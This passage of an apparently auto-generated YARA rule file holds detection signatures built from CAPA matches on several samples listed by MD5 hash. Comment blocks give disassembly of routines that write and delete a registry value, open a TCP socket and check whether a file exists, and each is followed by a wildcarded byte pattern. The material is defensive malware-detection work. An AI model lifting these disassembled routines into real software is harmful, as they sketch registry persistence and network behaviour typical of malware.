;__alloca_probe() + .text:0x0040107d 56 push esi + .text:0x0040107e 57 push edi + .text:0x0040107f b900040000 mov ecx,1024 + .text:0x00401084 33c0 xor eax,eax + .text:0x00401086 8dbdf8efffff lea edi,dword [ebp - 4104] + .text:0x0040108c f3ab rep: stosd + .text:0x0040108e aa stosb + .text:0x0040108f 8d85f8efffff lea eax,dword [ebp - 4104] + .text:0x00401095 8945fc mov dword [ebp - 4],eax + .text:0x00401098 8b7d08 mov edi,dword [ebp + 8] + .text:0x0040109b 8b55fc mov edx,dword [ebp - 4] + .text:0x0040109e 83c9ff or ecx,0xffffffff + .text:0x004010a1 33c0 xor eax,eax + .text:0x004010a3 f2ae repnz: scasb + .text:0x004010a5 f7d1 not ecx + .text:0x004010a7 2bf9 sub edi,ecx + .text:0x004010a9 8bf7 mov esi,edi + .text:0x004010ab 8bc1 mov eax,ecx + .text:0x004010ad 8bfa mov edi,edx + .text:0x004010af c1e902 shr ecx,2 + .text:0x004010b2 f3a5 rep: movsd + 
.text:0x004010b4 8bc8 mov ecx,eax + .text:0x004010b6 83e103 and ecx,3 + .text:0x004010b9 f3a4 rep: movsb + .text:0x004010bb 8b7d08 mov edi,dword [ebp + 8] + .text:0x004010be 83c9ff or ecx,0xffffffff + .text:0x004010c1 33c0 xor eax,eax + .text:0x004010c3 f2ae repnz: scasb + .text:0x004010c5 f7d1 not ecx + .text:0x004010c7 83c1ff add ecx,0xffffffff + .text:0x004010ca 8b55fc mov edx,dword [ebp - 4] + .text:0x004010cd 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004010d1 8945fc mov dword [ebp - 4],eax + .text:0x004010d4 8b7d0c mov edi,dword [ebp + 12] + .text:0x004010d7 8b55fc mov edx,dword [ebp - 4] + .text:0x004010da 83c9ff or ecx,0xffffffff + .text:0x004010dd 33c0 xor eax,eax + .text:0x004010df f2ae repnz: scasb + .text:0x004010e1 f7d1 not ecx + .text:0x004010e3 2bf9 sub edi,ecx + .text:0x004010e5 8bf7 mov esi,edi + .text:0x004010e7 8bc1 mov eax,ecx + .text:0x004010e9 8bfa mov edi,edx + .text:0x004010eb c1e902 shr ecx,2 + .text:0x004010ee f3a5 rep: movsd + .text:0x004010f0 8bc8 mov ecx,eax + .text:0x004010f2 83e103 and ecx,3 + .text:0x004010f5 f3a4 rep: movsb + .text:0x004010f7 8b7d0c mov edi,dword [ebp + 12] + .text:0x004010fa 83c9ff or ecx,0xffffffff + .text:0x004010fd 33c0 xor eax,eax + .text:0x004010ff f2ae repnz: scasb + .text:0x00401101 f7d1 not ecx + .text:0x00401103 83c1ff add ecx,0xffffffff + .text:0x00401106 8b55fc mov edx,dword [ebp - 4] + .text:0x00401109 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040110d 8945fc mov dword [ebp - 4],eax + .text:0x00401110 8b7d10 mov edi,dword [ebp + 16] + .text:0x00401113 8b55fc mov edx,dword [ebp - 4] + .text:0x00401116 83c9ff or ecx,0xffffffff + .text:0x00401119 33c0 xor eax,eax + .text:0x0040111b f2ae repnz: scasb + .text:0x0040111d f7d1 not ecx + .text:0x0040111f 2bf9 sub edi,ecx + .text:0x00401121 8bf7 mov esi,edi + .text:0x00401123 8bc1 mov eax,ecx + .text:0x00401125 8bfa mov edi,edx + .text:0x00401127 c1e902 shr ecx,2 + .text:0x0040112a f3a5 rep: movsd + .text:0x0040112c 8bc8 mov ecx,eax + 
.text:0x0040112e 83e103 and ecx,3 + .text:0x00401131 f3a4 rep: movsb + .text:0x00401133 8b7d10 mov edi,dword [ebp + 16] + .text:0x00401136 83c9ff or ecx,0xffffffff + .text:0x00401139 33c0 xor eax,eax + .text:0x0040113b f2ae repnz: scasb + .text:0x0040113d f7d1 not ecx + .text:0x0040113f 83c1ff add ecx,0xffffffff + .text:0x00401142 8b55fc mov edx,dword [ebp - 4] + .text:0x00401145 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x00401149 8945fc mov dword [ebp - 4],eax + .text:0x0040114c 8b7d14 mov edi,dword [ebp + 20] + .text:0x0040114f 8b55fc mov edx,dword [ebp - 4] + .text:0x00401152 83c9ff or ecx,0xffffffff + .text:0x00401155 33c0 xor eax,eax + .text:0x00401157 f2ae repnz: scasb + .text:0x00401159 f7d1 not ecx + .text:0x0040115b 2bf9 sub edi,ecx + .text:0x0040115d 8bf7 mov esi,edi + .text:0x0040115f 8bc1 mov eax,ecx + .text:0x00401161 8bfa mov edi,edx + .text:0x00401163 c1e902 shr ecx,2 + .text:0x00401166 f3a5 rep: movsd + .text:0x00401168 8bc8 mov ecx,eax + .text:0x0040116a 83e103 and ecx,3 + .text:0x0040116d f3a4 rep: movsb + .text:0x0040116f 8b7d14 mov edi,dword [ebp + 20] + .text:0x00401172 83c9ff or ecx,0xffffffff + .text:0x00401175 33c0 xor eax,eax + .text:0x00401177 f2ae repnz: scasb + .text:0x00401179 f7d1 not ecx + .text:0x0040117b 83c1ff add ecx,0xffffffff + .text:0x0040117e 8b55fc mov edx,dword [ebp - 4] + .text:0x00401181 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x00401185 8945fc mov dword [ebp - 4],eax + .text:0x00401188 6a00 push 0 + .text:0x0040118a 8d8df4efffff lea ecx,dword [ebp - 4108] + .text:0x00401190 51 push ecx + .text:0x00401191 6a00 push 0 + .text:0x00401193 683f000f00 push 0x000f003f + .text:0x00401198 6a00 push 0 + .text:0x0040119a 6a00 push 0 + .text:0x0040119c 6a00 push 0 + .text:0x0040119e 6840c04000 push 0x0040c040 + .text:0x004011a3 6802000080 push 0x80000002 + .text:0x004011a8 ff1518b04000 call dword [0x0040b018] ;advapi32.RegCreateKeyExA(0x80000002,0x0040c040,0,0,0,0x000f003f,0,local4112,0) + .text:0x004011ae 85c0 test 
eax,eax + .text:0x004011b0 7407 jz 0x004011b9 + .text:0x004011b2 b801000000 mov eax,1 + .text:0x004011b7 eb49 jmp 0x00401202 + .text:0x004011b9 loc_004011b9: [1 XREFS] + .text:0x004011b9 6800100000 push 0x00001000 + .text:0x004011be 8d95f8efffff lea edx,dword [ebp - 4104] + .text:0x004011c4 52 push edx + .text:0x004011c5 6a03 push 3 + .text:0x004011c7 6a00 push 0 + .text:0x004011c9 6830c04000 push 0x0040c030 + .text:0x004011ce 8b85f4efffff mov eax,dword [ebp - 4108] + .text:0x004011d4 50 push eax + .text:0x004011d5 ff151cb04000 call dword [0x0040b01c] ;advapi32.RegSetValueExA(0xfefefefe,0x0040c030,0,3,local4108,0x00001000) + .text:0x004011db 85c0 test eax,eax + .text:0x004011dd 7414 jz 0x004011f3 + .text:0x004011df 8b8df4efffff mov ecx,dword [ebp - 4108] + .text:0x004011e5 51 push ecx + .text:0x004011e6 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004011ec b801000000 mov eax,1 + .text:0x004011f1 eb0f jmp 0x00401202 + .text:0x004011f3 loc_004011f3: [1 XREFS] + .text:0x004011f3 8b95f4efffff mov edx,dword [ebp - 4108] + .text:0x004011f9 52 push edx + .text:0x004011fa ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401200 33c0 xor eax,eax + .text:0x00401202 loc_00401202: [2 XREFS] + .text:0x00401202 5f pop edi + .text:0x00401203 5e pop esi + .text:0x00401204 8be5 mov esp,ebp + .text:0x00401206 5d pop ebp + .text:0x00401207 c3 ret + */ + $c58 = { 55 8B EC B8 0C 10 00 00 E8 ?? ?? ?? ?? 56 57 B9 00 04 00 00 33 C0 8D BD ?? ?? ?? ?? F3 AB AA 8D 85 ?? ?? ?? ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 
83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 6A 00 8D 8D ?? ?? ?? ?? 51 6A 00 68 3F 00 0F 00 6A 00 6A 00 6A 00 68 40 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 00 10 00 00 8D 95 ?? ?? ?? ?? 52 6A 03 6A 00 68 30 C0 40 00 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 8B E5 5D C3 } + /* +function at 0x00401210@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - delete registry value + .text:0x00401210 + .text:0x00401210 FUNC: int cdecl sub_00401210( ) [2 XREFS] + .text:0x00401210 + .text:0x00401210 Stack Variables: (offset from initial top of stack) + .text:0x00401210 -8: int local8 + .text:0x00401210 -12: int local12 + .text:0x00401210 + .text:0x00401210 55 push ebp + .text:0x00401211 8bec mov ebp,esp + .text:0x00401213 83ec08 sub esp,8 + .text:0x00401216 6a00 push 0 + .text:0x00401218 8d45f8 lea eax,dword [ebp - 8] + .text:0x0040121b 50 push eax + .text:0x0040121c 6a00 push 0 + .text:0x0040121e 683f000f00 push 0x000f003f + .text:0x00401223 6a00 push 0 + .text:0x00401225 6a00 push 0 + .text:0x00401227 6a00 push 0 + .text:0x00401229 6840c04000 push 0x0040c040 + .text:0x0040122e 6802000080 push 0x80000002 + .text:0x00401233 ff1518b04000 call dword [0x0040b018] ;advapi32.RegCreateKeyExA(0x80000002,0x0040c040,0,0,0,0x000f003f,0,local12,0) + .text:0x00401239 85c0 test eax,eax + .text:0x0040123b 7407 jz 0x00401244 + .text:0x0040123d b801000000 mov eax,1 + .text:0x00401242 eb35 jmp 0x00401279 + .text:0x00401244 loc_00401244: [1 XREFS] + .text:0x00401244 6830c04000 push 0x0040c030 + .text:0x00401249 8b4df8 mov ecx,dword [ebp - 8] + 
.text:0x0040124c 51 push ecx + .text:0x0040124d ff1514b04000 call dword [0x0040b014] ;advapi32.RegDeleteValueA(0xfefefefe,0x0040c030) + .text:0x00401253 8945fc mov dword [ebp - 4],eax + .text:0x00401256 837dfc00 cmp dword [ebp - 4],0 + .text:0x0040125a 7411 jz 0x0040126d + .text:0x0040125c 8b55f8 mov edx,dword [ebp - 8] + .text:0x0040125f 52 push edx + .text:0x00401260 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401266 b801000000 mov eax,1 + .text:0x0040126b eb0c jmp 0x00401279 + .text:0x0040126d loc_0040126d: [1 XREFS] + .text:0x0040126d 8b45f8 mov eax,dword [ebp - 8] + .text:0x00401270 50 push eax + .text:0x00401271 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401277 33c0 xor eax,eax + .text:0x00401279 loc_00401279: [2 XREFS] + .text:0x00401279 8be5 mov esp,ebp + .text:0x0040127b 5d pop ebp + .text:0x0040127c c3 ret + */ + $c59 = { 55 8B EC 83 EC 08 6A 00 8D 45 ?? 50 6A 00 68 3F 00 0F 00 6A 00 6A 00 6A 00 68 40 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 30 C0 40 00 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 
33 C0 8B E5 5D C3 } + condition: + all of them +} + +rule super_rule_7faaf_b94af +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "7faafc7e4a5c736ebfee6abbbc812d80" + md5 = "b94af4a4d4af6eac81fc135abda1c40c" + strings: + /* +Basic Block at 0x00401b83@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - create TCP socket + .text:0x00401b83 loc_00401b83: [1 XREFS] + .text:0x00401b83 6a06 push 6 + .text:0x00401b85 6a01 push 1 + .text:0x00401b87 6a02 push 2 + .text:0x00401b89 ff1550b14000 call dword [0x0040b150] ;ws2_32.socket(2,1,6) + .text:0x00401b8f 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401b92 8901 mov dword [ecx],eax + .text:0x00401b94 8b5508 mov edx,dword [ebp + 8] + .text:0x00401b97 833aff cmp dword [edx],0xffffffff + .text:0x00401b9a 750d jnz 0x00401ba9 + */ + $c60 = { 6A 06 6A 01 6A 02 FF 15 ?? ?? ?? ?? 8B 4D ?? 89 01 8B 55 ?? 83 3A FF 75 ?? } + condition: + all of them +} + +rule super_rule_18ec5_7faaf_b94af +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "18ec5becfa3991fb654e105bafbd5a4b" + md5 = "7faafc7e4a5c736ebfee6abbbc812d80" + md5 = "b94af4a4d4af6eac81fc135abda1c40c" + strings: + /* +Basic Block at 0x00401a96@18ec5becfa3991fb654e105bafbd5a4b with 1 features: + - get file attributes + .text:0x00401a96 + .text:0x00401a96 FUNC: int cdecl sub_00401a96( int arg0, int arg1, ) [6 XREFS] + .text:0x00401a96 + .text:0x00401a96 Stack Variables: (offset from initial top of stack) + .text:0x00401a96 8: int arg1 + .text:0x00401a96 4: int arg0 + .text:0x00401a96 + .text:0x00401a96 ff742404 push dword [esp + 4] + .text:0x00401a9a ff1538804000 call dword [0x00408038] ;kernel32.GetFileAttributesA(arg0) + .text:0x00401aa0 83f8ff cmp eax,0xffffffff + .text:0x00401aa3 7511 jnz 0x00401ab6 + */ + $c61 = { FF 74 24 ?? FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? 
} + /* +function at 0x00401a96@18ec5becfa3991fb654e105bafbd5a4b with 1 features: + - check if file exists + .text:0x00401a96 + .text:0x00401a96 FUNC: int cdecl sub_00401a96( int arg0, int arg1, ) [6 XREFS] + .text:0x00401a96 + .text:0x00401a96 Stack Variables: (offset from initial top of stack) + .text:0x00401a96 8: int arg1 + .text:0x00401a96 4: int arg0 + .text:0x00401a96 + .text:0x00401a96 ff742404 push dword [esp + 4] + .text:0x00401a9a ff1538804000 call dword [0x00408038] ;kernel32.GetFileAttributesA(arg0) + .text:0x00401aa0 83f8ff cmp eax,0xffffffff + .text:0x00401aa3 7511 jnz 0x00401ab6 + .text:0x00401aa5 ff1534804000 call dword [0x00408034] ;ntdll.RtlGetLastWin32Error() + .text:0x00401aab 50 push eax + .text:0x00401aac e806210000 call 0x00403bb7 ;__dosmaperr(kernel32.GetLastError()) + .text:0x00401ab1 59 pop ecx + .text:0x00401ab2 loc_00401ab2: [1 XREFS] + .text:0x00401ab2 83c8ff or eax,0xffffffff + .text:0x00401ab5 c3 ret + .text:0x00401ab6 loc_00401ab6: [1 XREFS] + .text:0x00401ab6 a801 test al,1 + .text:0x00401ab8 741d jz 0x00401ad7 + .text:0x00401aba f644240802 test byte [esp + 8],2 + .text:0x00401abf 7416 jz 0x00401ad7 + .text:0x00401ac1 c705c0ba40000d00 mov dword [0x0040bac0],13 + .text:0x00401acb c705c4ba40000500 mov dword [0x0040bac4],5 + .text:0x00401ad5 ebdb jmp 0x00401ab2 + .text:0x00401ad7 loc_00401ad7: [2 XREFS] + .text:0x00401ad7 33c0 xor eax,eax + .text:0x00401ad9 c3 ret + */ + $c62 = { FF 74 24 ?? FF 15 ?? ?? ?? ?? 83 F8 FF 75 ?? FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 83 C8 FF C3 A8 01 74 ?? F6 44 24 ?? 02 74 ?? C7 05 ?? ?? ?? ?? 0D 00 00 00 C7 05 ?? ?? ?? ?? 05 00 00 00 EB ?? 33 C0 C3 } + condition: + all of them +} +